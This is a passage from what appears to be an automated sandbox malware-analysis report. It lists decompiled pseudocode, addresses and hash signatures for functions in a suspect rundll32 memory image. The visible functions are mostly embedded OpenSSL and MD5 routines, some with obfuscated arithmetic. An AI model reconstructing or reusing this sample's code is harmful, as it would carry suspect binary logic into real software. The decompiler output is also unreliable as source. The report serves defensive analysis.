				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000080;
				 *((intOrPtr*)(_t106 + 0xb8)) = 0;
				goto 0xf304a61f;
				 *((intOrPtr*)(_t106 + 0xb8)) = 0xffffffff;
				E0000021E21EF3091A90(_t104, _t106, _t104, _t104, _t106 + 0x110);
				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000001;
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t104, _t106);
				if (_t104 == 0) goto 0xf304a6b5;
				if (( *(_t106 + 0xc0) & 0x00000010) != 0) goto 0xf304a67a;
				r8d = r8d | 0xffffffff;
				if (E0000021E21EF30916F0(_t104, _t106) >= 0) goto 0xf304a67a;
				r8d = r8d | 0xffffffff;
				if (E0000021E21EF30916F0(_t104, _t106) < 0) goto 0xf304a684;
				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000080;
				if ( *_t104 == 0) goto 0xf304a699;
				 *((intOrPtr*)(_t106 + 0xbc)) = E0000021E21EF308C1F0(_t104,  *_t104);
				goto 0xf304a6a3;
				 *((intOrPtr*)(_t106 + 0xbc)) = 0xffffffff;
				E0000021E21EF3091840(_t104);
				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000400;
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t104, _t106);
				if (_t104 == 0) goto 0xf304a712;
				if ( *_t104 <= 0) goto 0xf304a6fd;
				r8d =  *( *(_t104 + 8)) & 0x000000ff;
				 *(_t106 + 0xc4) = r8d;
				if ( *_t104 - 1 <= 0) goto 0xf304a703;
				_t105 =  *(_t104 + 8);
				 *(_t106 + 0xc4) = ( *(_t105 + 1) & 0x000000ff) << 0x00000008 | r8d;
				goto 0xf304a703;
				 *(_t106 + 0xc4) = 0;
				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000002;
				E0000021E21EF30749F0(_t105);
				r9d = 0;
				_a48 = _t132;
				r8d = 0;
				 *((intOrPtr*)(_t106 + 0xc8)) = 0;
				_t66 = E0000021E21EF3091730(_t105, _t106);
				if (_t105 == 0) goto 0xf304a81e;
				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000004;
				_a72 = 0;
				if (_a72 - E0000021E21EF30290D0(_t66, _t105) >= 0) goto 0xf304a80f;
				E0000021E21EF30292D0(_t67, _a72, _t105);
				_t69 = E0000021E21EF3031F80(_t105, _t105);
				_t102 = _t69 - 0xb4;
				if (_t102 > 0) goto 0xf304a7d3;
				if (_t102 == 0) goto 0xf304a7ca;
				if (_t69 - 0x81 - 0xa > 0) goto 0xf304a7f7;
				goto __rcx;
			}















                                        0x21ef304a567
                                        0x21ef304a579
                                        0x21ef304a57c
                                        0x21ef304a582
                                        0x21ef304a587
                                        0x21ef304a58c
                                        0x21ef304a59b
                                        0x21ef304a5a1
                                        0x21ef304a5b0
                                        0x21ef304a5b2
                                        0x21ef304a5b9
                                        0x21ef304a5bc
                                        0x21ef304a5c6
                                        0x21ef304a5d3
                                        0x21ef304a5d7
                                        0x21ef304a5d9
                                        0x21ef304a5e0
                                        0x21ef304a5e7
                                        0x21ef304a5f0
                                        0x21ef304a5f4
                                        0x21ef304a5fb
                                        0x21ef304a601
                                        0x21ef304a603
                                        0x21ef304a60d
                                        0x21ef304a613
                                        0x21ef304a615
                                        0x21ef304a622
                                        0x21ef304a627
                                        0x21ef304a62e
                                        0x21ef304a631
                                        0x21ef304a63c
                                        0x21ef304a647
                                        0x21ef304a650
                                        0x21ef304a652
                                        0x21ef304a664
                                        0x21ef304a666
                                        0x21ef304a678
                                        0x21ef304a67a
                                        0x21ef304a68a
                                        0x21ef304a691
                                        0x21ef304a697
                                        0x21ef304a699
                                        0x21ef304a6a6
                                        0x21ef304a6ab
                                        0x21ef304a6b5
                                        0x21ef304a6b8
                                        0x21ef304a6c2
                                        0x21ef304a6cd
                                        0x21ef304a6d1
                                        0x21ef304a6d7
                                        0x21ef304a6db
                                        0x21ef304a6e5
                                        0x21ef304a6e7
                                        0x21ef304a6f5
                                        0x21ef304a6fb
                                        0x21ef304a6fd
                                        0x21ef304a703
                                        0x21ef304a70d
                                        0x21ef304a712
                                        0x21ef304a715
                                        0x21ef304a71a
                                        0x21ef304a71d
                                        0x21ef304a72a
                                        0x21ef304a735
                                        0x21ef304a73b
                                        0x21ef304a745
                                        0x21ef304a754
                                        0x21ef304a766
                                        0x21ef304a76e
                                        0x21ef304a773
                                        0x21ef304a778
                                        0x21ef304a77a
                                        0x21ef304a784
                                        0x21ef304a792

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-227171996
                                        • Opcode ID: ccedb4ebde485a41ecf417a9171f1e5013778130b84f73e08294f475e0a0bc86
                                        • Instruction ID: 75aa7cae5819f94168413da7a438d848220a205223078d2480af9dc33809a57e
                                        • Opcode Fuzzy Hash: ccedb4ebde485a41ecf417a9171f1e5013778130b84f73e08294f475e0a0bc86
                                        • Instruction Fuzzy Hash: 5DC1823220528186FF589F25DD59BEF77A1E7A0B84F198136DE0647F96EB7C8902CB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF304C610 Relevance: 2.8, Strings: 2, Instructions: 273COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E0000021E21EF304C610(void* __ecx, intOrPtr __edx, void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi, char* __r8, void* __r9, long long __r13, long long __r14, intOrPtr _a8, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, long long _a40, long long _a48, char _a56, signed long long _a80, long long _a88, long long _a96, long long _a104, long long _a112, long long _a160) {
				void* __rbp;
				intOrPtr _t75;
				char _t91;
				void* _t130;
				unsigned int _t131;
				char _t133;
				char _t134;
				signed long long _t181;
				signed long long _t184;
				signed char* _t185;
				long long _t188;
				void* _t189;
				void* _t191;
				char* _t195;
				char* _t196;
				signed long long _t203;
				void* _t217;
				signed int _t219;
				intOrPtr _t222;
				void* _t229;
				signed long long _t230;
				void* _t231;
				intOrPtr _t236;
				signed char* _t240;
				long long _t243;

				_t243 = __r14;
				_t227 = __rsi;
				_t217 = __rdx;
				_t188 = __rbx;
				E0000021E21EF310C220();
				_t181 =  *0xf3203000; // 0x1fc8e4a4378e
				_a80 = _t181 ^ _t231 - __rax;
				_a36 = __edx;
				_a48 = __rcx;
				_a24 = 0;
				_a32 = 0x18;
				r15d = r9d;
				if (r9d != 0) goto 0xf304c65f;
				goto 0xf304ca28;
				if (r9d != 0xffffffff) goto 0xf304c688;
				r15d = 0;
				if ( *((intOrPtr*)(__r8)) == 0) goto 0xf304c683;
				if (r15d - 0x80000000 >= 0) goto 0xf304c683;
				_t184 = __r8 + 1;
				r15d = r15d + 1;
				if ( *_t184 != 0) goto 0xf304c670;
				asm("inc ecx");
				_t195 = __r8 + 1;
				_a160 = __rbx;
				_t75 =  *__r8 + 0xffffffd0;
				_a112 = __rsi;
				r15d = r15d - 1;
				_a104 = __rdi;
				_a96 = __r13;
				_a88 = __r14;
				_a28 = _t75;
				if (_t75 - 2 > 0) goto 0xf304c9da;
				if (r15d > 0) goto 0xf304c6dd;
				_a8 = 0x42;
				r8d = 0x8a;
				goto 0xf304c9e8;
				_t133 =  *_t195;
				r15d = r15d - 1;
				_t196 = _t195 + 1;
				_a40 = _t196;
				if (r15d <= 0) goto 0xf304c9cc;
				if (_t133 == 0x2e) goto 0xf304c702;
				if (_t133 != 0x20) goto 0xf304c93a;
				r13d = 0;
				if (r15d <= 0) goto 0xf304c7c2;
				_t134 =  *_t196;
				r15d = r15d - 1;
				_a40 = _t196 + 1;
				if (_t134 == 0x20) goto 0xf304c7ba;
				if (_t134 == 0x2e) goto 0xf304c7ba;
				if (_t134 - 0x30 < 0) goto 0xf304c94a;
				if (_t134 - 0x39 > 0) goto 0xf304c94a;
				if (r13d != 0) goto 0xf304c781;
				if (0 - 0x19999991 < 0) goto 0xf304c7f4;
				r13d = 1;
				if (_t229 != 0) goto 0xf304c76f;
				E0000021E21EF3043D30(_t229, _t184, __rsi, _t229);
				_t230 = _t184;
				if (_t184 == 0) goto 0xf304c98c;
				if (E0000021E21EF3044090(_t184, __rbx, _t230, _t217) == 0) goto 0xf304c98c;
				if (E0000021E21EF304B630(_t184, _t188, _t230, _t217) == 0) goto 0xf304c98c;
				if (E0000021E21EF304B340(_t184, _t188, _t230, __rsi - 0x30) == 0) goto 0xf304c98c;
				if (r15d > 0) goto 0xf304c710;
				if (_a24 != 0) goto 0xf304c802;
				if (_a28 - 2 >= 0) goto 0xf304c7d4;
				if (0 - 0x28 >= 0) goto 0xf304c95a;
				if (r13d == 0) goto 0xf304c7ff;
				_t219 = _t184 + _t184 * 4 << 3;
				if (E0000021E21EF304B340(_t184, _t188, _t230, _t219) == 0) goto 0xf304c98c;
				goto 0xf304c802;
				goto 0xf304c7b1;
				r14d = 0;
				if (r13d == 0) goto 0xf304c8b0;
				_t203 = _t230;
				E0000021E21EF3043D90(_t184, _t203);
				_t130 = (_t203 + _t219 >> 2) + (_t203 + _t219 >> 2 >> 0x1f);
				if (_t130 - _a32 <= 0) goto 0xf304c87a;
				_t185 =  &_a56;
				if ( &_a56 == _t185) goto 0xf304c852;
				_t38 = _t243 + 0x7c; // 0x7c
				r8d = _t38;
				E0000021E21EF3025750();
				r8d = 0x7e;
				_a32 = __rdi + 0x20;
				E0000021E21EF3025700();
				_t240 = _t185;
				if (_t185 == 0) goto 0xf304c98c;
				if (_t130 == 0) goto 0xf304c8c7;
				_t131 = _t130 - 1;
				_t91 = E0000021E21EF304B450(_t185, _t230, "..\\..\\openssl-1.1.0f\\crypto\\asn1\\a_object.c");
				if (_t185 == 0xffffffff) goto 0xf304c98c;
				 *((char*)(_t188 + _t240)) = _t91;
				r14d = r14d + 1;
				_t189 = _t188 + 1;
				if (_t131 != 0) goto 0xf304c880;
				goto 0xf304c8c7;
				r14d = r14d + 1;
				 *(_t189 + _t240) = dil & 0x7f;
				if (_t131 >> 7 != 0) goto 0xf304c8b0;
				_t236 = _a48;
				if (_t236 == 0) goto 0xf304c918;
				_t222 = _a24;
				if (__r14 + _t222 - _a36 > 0) goto 0xf304c96a;
				_t191 = _t189 + 1 - 1;
				if (_t191 <= 0) goto 0xf304c908;
				 *(_t236 + _t222 + 1 - 1) =  *(_t191 + _t240) & 0x000000ff | 0x00000080;
				if (_t191 - 1 > 0) goto 0xf304c8f2;
				 *((char*)(0x80 + _t236)) =  *_t240 & 0x000000ff;
				goto 0xf304c91f;
				_a24 = _a24 + r14d;
				if (r15d <= 0) goto 0xf304c9ad;
				goto 0xf304c6f4;
				_a8 = 0x4b;
				r8d = 0x83;
				goto 0xf304c978;
				_a8 = 0x58;
				r8d = 0x82;
				goto 0xf304c978;
				_a8 = 0x6c;
				r8d = 0x93;
				goto 0xf304c978;
				_a8 = 0x94;
				r8d = 0x6b;
				_t60 = _t222 - 0x57; // 0xd
				E0000021E21EF30222D0(_t60, 0x64, r15d, _t185, _t191 - 1, _a40, _t222, __rsi, _t230, "..\\..\\openssl-1.1.0f\\crypto\\asn1\\a_object.c");
				if (_t240 ==  &_a56) goto 0xf304c9fc;
				r8d = 0xa3;
				E0000021E21EF3025750();
				goto 0xf304c9fc;
				if (_t240 ==  &_a56) goto 0xf304c9cc;
				r8d = 0x9e;
				_t224 = "..\\..\\openssl-1.1.0f\\crypto\\asn1\\a_object.c";
				E0000021E21EF3025750();
				E0000021E21EF3043B20( &_a56, _t230);
				goto 0xf304ca06;
				_a8 = 0x3d;
				r8d = 0x7a;
				_t65 = _t224 - 0x57; // 0xd
				E0000021E21EF30222D0(_t65, 0x64, _t240 -  &_a56,  &_a56, _t191 - 1, _t230, "..\\..\\openssl-1.1.0f\\crypto\\asn1\\a_object.c", _t227, _t230, "..\\..\\openssl-1.1.0f\\crypto\\asn1\\a_object.c");
				E0000021E21EF3043B20( &_a56, _t230);
				E0000021E21EF310C290();
				return 0;
			}




























                                        0x21ef304c610
                                        0x21ef304c610
                                        0x21ef304c610
                                        0x21ef304c610
                                        0x21ef304c61b
                                        0x21ef304c623
                                        0x21ef304c62d
                                        0x21ef304c632
                                        0x21ef304c63d
                                        0x21ef304c644
                                        0x21ef304c648
                                        0x21ef304c650
                                        0x21ef304c656
                                        0x21ef304c65a
                                        0x21ef304c663
                                        0x21ef304c665
                                        0x21ef304c66e
                                        0x21ef304c677
                                        0x21ef304c679
                                        0x21ef304c67c
                                        0x21ef304c681
                                        0x21ef304c683
                                        0x21ef304c68c
                                        0x21ef304c690
                                        0x21ef304c698
                                        0x21ef304c69b
                                        0x21ef304c6a3
                                        0x21ef304c6a6
                                        0x21ef304c6ae
                                        0x21ef304c6b3
                                        0x21ef304c6b8
                                        0x21ef304c6bf
                                        0x21ef304c6c8
                                        0x21ef304c6ca
                                        0x21ef304c6d2
                                        0x21ef304c6d8
                                        0x21ef304c6dd
                                        0x21ef304c6e0
                                        0x21ef304c6e3
                                        0x21ef304c6e6
                                        0x21ef304c6ee
                                        0x21ef304c6f7
                                        0x21ef304c6fc
                                        0x21ef304c704
                                        0x21ef304c70a
                                        0x21ef304c710
                                        0x21ef304c713
                                        0x21ef304c719
                                        0x21ef304c721
                                        0x21ef304c72a
                                        0x21ef304c733
                                        0x21ef304c73c
                                        0x21ef304c745
                                        0x21ef304c74d
                                        0x21ef304c753
                                        0x21ef304c75c
                                        0x21ef304c75e
                                        0x21ef304c763
                                        0x21ef304c769
                                        0x21ef304c77b
                                        0x21ef304c790
                                        0x21ef304c7a6
                                        0x21ef304c7b4
                                        0x21ef304c7c4
                                        0x21ef304c7c9
                                        0x21ef304c7ce
                                        0x21ef304c7da
                                        0x21ef304c7e2
                                        0x21ef304c7ec
                                        0x21ef304c7f2
                                        0x21ef304c7fd
                                        0x21ef304c802
                                        0x21ef304c80a
                                        0x21ef304c810
                                        0x21ef304c813
                                        0x21ef304c82d
                                        0x21ef304c833
                                        0x21ef304c835
                                        0x21ef304c83d
                                        0x21ef304c83f
                                        0x21ef304c83f
                                        0x21ef304c84d
                                        0x21ef304c855
                                        0x21ef304c865
                                        0x21ef304c869
                                        0x21ef304c86e
                                        0x21ef304c874
                                        0x21ef304c87c
                                        0x21ef304c888
                                        0x21ef304c88a
                                        0x21ef304c893
                                        0x21ef304c899
                                        0x21ef304c89d
                                        0x21ef304c8a0
                                        0x21ef304c8a5
                                        0x21ef304c8a7
                                        0x21ef304c8b4
                                        0x21ef304c8bc
                                        0x21ef304c8c5
                                        0x21ef304c8c7
                                        0x21ef304c8cf
                                        0x21ef304c8d1
                                        0x21ef304c8de
                                        0x21ef304c8e4
                                        0x21ef304c8ea
                                        0x21ef304c900
                                        0x21ef304c906
                                        0x21ef304c912
                                        0x21ef304c916
                                        0x21ef304c91f
                                        0x21ef304c926
                                        0x21ef304c935
                                        0x21ef304c93a
                                        0x21ef304c942
                                        0x21ef304c948
                                        0x21ef304c94a
                                        0x21ef304c952
                                        0x21ef304c958
                                        0x21ef304c95a
                                        0x21ef304c962
                                        0x21ef304c968
                                        0x21ef304c96a
                                        0x21ef304c972
                                        0x21ef304c984
                                        0x21ef304c987
                                        0x21ef304c994
                                        0x21ef304c996
                                        0x21ef304c9a6
                                        0x21ef304c9ab
                                        0x21ef304c9b5
                                        0x21ef304c9b7
                                        0x21ef304c9bd
                                        0x21ef304c9c7
                                        0x21ef304c9cf
                                        0x21ef304c9d8
                                        0x21ef304c9da
                                        0x21ef304c9e2
                                        0x21ef304c9f4
                                        0x21ef304c9f7
                                        0x21ef304c9ff
                                        0x21ef304ca30
                                        0x21ef304ca41

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\crypto\asn1\a_object.c$=
                                        • API String ID: 0-3591452426
                                        • Opcode ID: 818ff51b82c7eeef712e516e75010a25e75971f176d11a5dac5add2e2cf804d7
                                        • Instruction ID: 574b49fba46b084fabcf2a99ded2b56f32ac0bf6fbd647e3d6a971bdef085f20
                                        • Opcode Fuzzy Hash: 818ff51b82c7eeef712e516e75010a25e75971f176d11a5dac5add2e2cf804d7
                                        • Instruction Fuzzy Hash: 5BB10272215680B6FE60DA25E8483EBB791F7A1744F468117EE8A47E95DB3CCE47CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE3760 Relevance: 2.6, Strings: 2, Instructions: 112COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 65%
                                        			E0000021E21EF2FE3760(long long __rcx, long long __rdx, signed long long __r8) {
				signed int _v12;
				long long _v24;
				long long _v32;
				long long _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* __rbx;
				intOrPtr _t60;
				signed int _t74;
				signed int _t81;
				void* _t91;
				void* _t92;
				void* _t105;
				void* _t106;
				signed long long _t107;
				void* _t108;

				_t107 = __r8;
				_v12 = r9d;
				_v24 = __r8;
				_v32 = __rdx;
				_v40 = __rcx;
				r9d = _v12;
				r9d = r9d & 0x00000003;
				if (r9d == 0) goto 0xf2fe37a5;
				r8d = 0xf5;
				E0000021E21EF31205A8(_t91, _t92, L"nLength % 4 == 0", L"Z:\\hooker2\\Common\\md5.cpp", _t105, _t106, __r8, _t108);
				_v44 = 0;
				_v48 = 0;
				if (_v48 - _v12 >= 0) goto 0xf2fe391b;
				r8d = _v44;
				r9d = 0xffffffff;
				r10d = r9d;
				r10d = r10d ^ 0x000000ff;
				r11d = r9d;
				r11d = r11d ^ 0x12157d02;
				r11d = r11d | 0x12157d02;
				r8d = _v48;
				 *((char*)(_v32 + _t107)) = (( *(_v24 + _t107 * 4) ^ 0xffffffff | r10d) ^ 0xffffffff) & r11d;
				r8d = _v44;
				_t74 =  *(_v24 + _t107 * 4) >> 8;
				r10d = r9d;
				r10d = r10d ^ 0x000000ff;
				r11d = _t74;
				r11d = r11d ^ r10d;
				r11d = r11d & _t74;
				r8d = _v48 - 0xdd427069 + 0xdd42706a;
				 *((char*)(_v32 + _t107)) = r11b;
				r8d = _v44;
				_t81 =  *(_v24 + _t107 * 4) >> 0x10;
				r10d = r9d;
				r10d = r10d ^ 0x000000ff;
				r11d = _t81;
				r11d = r11d ^ r10d;
				r11d = r11d & _t81;
				r10d = 0;
				r10d = r10d - _v48;
				r10d = r10d + 0xfffffffffffffffe;
				r8d = 0 - r10d;
				 *((char*)(_v32 + _t107)) = r11b;
				r8d = _v44;
				r9d = r9d ^ 0x000000ff;
				r8d = _v48 + 0xe1c4fef5 - 0xe1c4fef2;
				 *((char*)(_v32 + _t107)) = ( *(_v24 + _t107 * 4) >> 0x00000018 ^ r9d) &  *(_v24 + _t107 * 4) >> 0x00000018;
				_v44 = _v44 - 0x9c0a09ed + 0x9c0a09ee;
				_t60 = _v48 + 0x7645d3b1 - 0x7645d3ad;
				_v48 = _t60;
				goto 0xf2fe37b5;
				return _t60;
			}



















                                        0x21ef2fe3760
                                        0x21ef2fe3765
                                        0x21ef2fe376a
                                        0x21ef2fe376f
                                        0x21ef2fe3774
                                        0x21ef2fe3779
                                        0x21ef2fe377e
                                        0x21ef2fe3786
                                        0x21ef2fe379a
                                        0x21ef2fe37a0
                                        0x21ef2fe37a5
                                        0x21ef2fe37ad
                                        0x21ef2fe37bd
                                        0x21ef2fe37ce
                                        0x21ef2fe37d8
                                        0x21ef2fe37de
                                        0x21ef2fe37e1
                                        0x21ef2fe37e8
                                        0x21ef2fe37eb
                                        0x21ef2fe37f5
                                        0x21ef2fe380d
                                        0x21ef2fe3810
                                        0x21ef2fe381d
                                        0x21ef2fe3824
                                        0x21ef2fe3827
                                        0x21ef2fe382a
                                        0x21ef2fe3831
                                        0x21ef2fe3834
                                        0x21ef2fe3837
                                        0x21ef2fe3857
                                        0x21ef2fe385a
                                        0x21ef2fe3867
                                        0x21ef2fe386e
                                        0x21ef2fe3871
                                        0x21ef2fe3874
                                        0x21ef2fe387b
                                        0x21ef2fe387e
                                        0x21ef2fe3881
                                        0x21ef2fe3890
                                        0x21ef2fe3893
                                        0x21ef2fe389b
                                        0x21ef2fe38a3
                                        0x21ef2fe38a6
                                        0x21ef2fe38b3
                                        0x21ef2fe38bd
                                        0x21ef2fe38e5
                                        0x21ef2fe38e8
                                        0x21ef2fe38fd
                                        0x21ef2fe390d
                                        0x21ef2fe3912
                                        0x21ef2fe3916
                                        0x21ef2fe3920

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _set_error_mode
                                        • String ID: Z:\hooker2\Common\md5.cpp$nLength % 4 == 0
                                        • API String ID: 1949149715-326578492
                                        • Opcode ID: 1ec0ba3e53606f8f7f560c158cf8ee44c06b5a6f610ce717e79373fcf4f14dc5
                                        • Instruction ID: a74ed48e14fe33d5644c5be8d0fbf8e3a5b609c98648bc41e1ed9bb113da3268
                                        • Opcode Fuzzy Hash: 1ec0ba3e53606f8f7f560c158cf8ee44c06b5a6f610ce717e79373fcf4f14dc5
                                        • Instruction Fuzzy Hash: 1F41A3337285408AD321CF2EE48461ABBA1E3E9794F249210FE5E83F58D63AD542CF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEC0A0 Relevance: 1.8, Strings: 1, Instructions: 511COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF2FEC0A0() {
				intOrPtr* _t11;

				r9d =  *((char*)( *_t11));
				r9d = r9d + 0xffffffde;
				if (r9d - 0x59 > 0) goto 0xf2fec0f3;
				r9d =  *(0x21ef2fe0000 + 0xc0f8 + r9d * 4);
				goto __r9;
			}




                                        0x21ef2fec0a3
                                        0x21ef2fec0a7
                                        0x21ef2fec0af
                                        0x21ef2fec0c4
                                        0x21ef2fec0cf

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: gfff
                                        • API String ID: 0-1553575800
                                        • Opcode ID: 821f09f5ac57a6e895cebfca44710b7ccf1c2054373d14ebb9cb9d532e0c8926
                                        • Instruction ID: 2470e4e9b1044e9bd50585041e7c3d32a3f04fb8f1b272e5b91f0efc2d34b963
                                        • Opcode Fuzzy Hash: 821f09f5ac57a6e895cebfca44710b7ccf1c2054373d14ebb9cb9d532e0c8926
                                        • Instruction Fuzzy Hash: 4412F433631F8949FF268B2888483ED67A5F7B5744F562245EE9663FA5C734C8D38280
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3013E70 Relevance: 1.6, Strings: 1, Instructions: 365COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF3013E70(void* __rax, void* __rcx, char* __rdx) {
				signed int _t21;
				char* _t39;
				char* _t40;
				char* _t42;

				if (__rcx - 0x5f5e100 >= 0) goto 0xf3013fad;
				_t42 = "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899A";
				if (r8d - 0x2710 >= 0) goto 0xf3013ef1;
				if (r8d - 0x3e8 < 0) goto 0xf3013ec0;
				 *__rdx =  *(__rcx + _t42) & 0x000000ff;
				_t39 = __rdx + 1;
				if (r8d - 0x64 < 0) goto 0xf3013ed2;
				 *_t39 =  *(__rax + _t42) & 0x000000ff;
				_t40 = _t39 + 1;
				if (r8d - 0xa < 0) goto 0xf3013ee1;
				 *_t40 =  *(__rdx + _t42) & 0x000000ff;
				_t21 =  *(__rax + _t42) & 0x000000ff;
				 *(_t40 + 1) = _t21;
				return _t21;
			}







                                        0x21ef3013e80
                                        0x21ef3013e86
                                        0x21ef3013e94
                                        0x21ef3013eb5
                                        0x21ef3013ebb
                                        0x21ef3013ebd
                                        0x21ef3013ec4
                                        0x21ef3013ecd
                                        0x21ef3013ecf
                                        0x21ef3013ed6
                                        0x21ef3013edc
                                        0x21ef3013ee4
                                        0x21ef3013ee8
                                        0x21ef3013ef0

                                        Strings
                                        • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899A, xrefs: 0000021EF3013E86, 0000021EF3013FE4, 0000021EF30141A5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899A
                                        • API String ID: 0-2335613334
                                        • Opcode ID: 9476030da8e6a13065c7153ca1aecc6efb304b53124584b0137bf1bd8cfb2677
                                        • Instruction ID: 8a9876b246193fd9c681c753aeb8818b3c57c4e1c33c57ceecf7cb5760150993
                                        • Opcode Fuzzy Hash: 9476030da8e6a13065c7153ca1aecc6efb304b53124584b0137bf1bd8cfb2677
                                        • Instruction Fuzzy Hash: 17E105721092D04EC3168F7AE4445ADBFB6D365B80B098377DBE687B93D12DD25ACB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF307EF10 Relevance: 1.6, Strings: 1, Instructions: 331COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 42%
                                        			E0000021E21EF307EF10(signed int __ebx, void* __ecx, intOrPtr __edx, signed int __ebp, void* __rax, long long __rbx, long long __rcx, void* __r8, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r15;
				signed int _t92;
				void* _t108;
				signed int _t111;
				signed int _t113;
				void* _t162;
				void* _t175;
				void* _t183;
				void* _t185;
				void* _t187;
				signed long long _t192;
				signed long long _t195;
				long long _t206;
				intOrPtr _t208;
				signed long long _t210;
				void* _t219;
				void* _t226;
				void* _t247;
				signed long long _t253;
				long long _t255;
				signed char* _t260;
				signed int _t262;
				void* _t266;
				signed long long _t267;
				signed long long _t282;
				void* _t284;
				signed char* _t296;
				signed char* _t298;
				void* _t304;
				void* _t308;

				_t284 = __r9;
				_t113 = __ebx;
				 *((long long*)(_t266 + 0x10)) = __rbx;
				_push(_t255);
				_push(_t304);
				E0000021E21EF310C220();
				_t267 = _t266 - __rax;
				_t192 =  *0xf3203000; // 0x1fc8e4a4378e
				 *(_t267 + 0xe0) = _t192 ^ _t267;
				r15d = r15d | 0xffffffff;
				_t208 =  *((intOrPtr*)(_t267 + 0x170));
				 *((long long*)(_t267 + 0x50)) =  *((intOrPtr*)(_t267 + 0x158));
				_t195 =  *((intOrPtr*)(_t267 + 0x168));
				r14d = 0;
				 *((intOrPtr*)(_t267 + 0x38)) = __edx;
				 *((long long*)(_t267 + 0x58)) = __rcx;
				 *(_t267 + 0x48) = _t195;
				if (_t195 != 0) goto 0xf307ef92;
				E0000021E21EF303DA70(0xf0);
				 *(_t267 + 0x48) = _t195;
				_t209 =  ==  ? _t195 : _t208;
				 *((long long*)(_t267 + 0x40)) =  ==  ? _t195 : _t208;
				_t210 = E0000021E21EF3041090(_t195, _t195);
				if ( *((intOrPtr*)(_t267 + 0x38)) <= 0) goto 0xf307f3d1;
				if (r12d <= 0) goto 0xf307f3d1;
				if (__ebp - r12d < 0) goto 0xf307f33e;
				if (__ebp - 2 + _t210 * 2 < 0) goto 0xf307f33e;
				r14d = __ebp;
				r14d = r14d - __ebx;
				r8d = 0x9d;
				r14d = r14d - 1;
				E0000021E21EF3025700();
				r8d = 0x9e;
				_t253 = _t195;
				E0000021E21EF3025700();
				 *(_t267 + 0x30) = _t195;
				if (_t253 == 0) goto 0xf307f3ad;
				if (_t195 == 0) goto 0xf307f3ad;
				E0000021E21EF310E410(2 + _t210 * 2, 0, 0, _t162, _t195, "..\\..\\openssl-1.1.0f\\crypto\\rsa\\rsa_oaep.c", _t253,  *((intOrPtr*)(_t267 + 0x150)));
				_t296 =  *(_t267 + 0x30);
				E0000021E21EF310DC90(2 + _t210 * 2, 0, 0, _t162,  &(_t296[ *((intOrPtr*)(_t267 + 0x150)) - r9d]), __r8, _t253, _t255, r9d);
				_t260 =  &(_t296[1]);
				r9d = r14d;
				_t298 =  &(( &(_t296[1]))[_t210]);
				_t20 = _t195 - 1; // -1
				 *((long long*)(_t267 + 0x20)) =  *((intOrPtr*)(_t267 + 0x40));
				 *(_t267 + 0x3c) =  ~(_t20 >> 0x0000001f &  !( *_t296 & 0x000000ff) >> 0x0000001f);
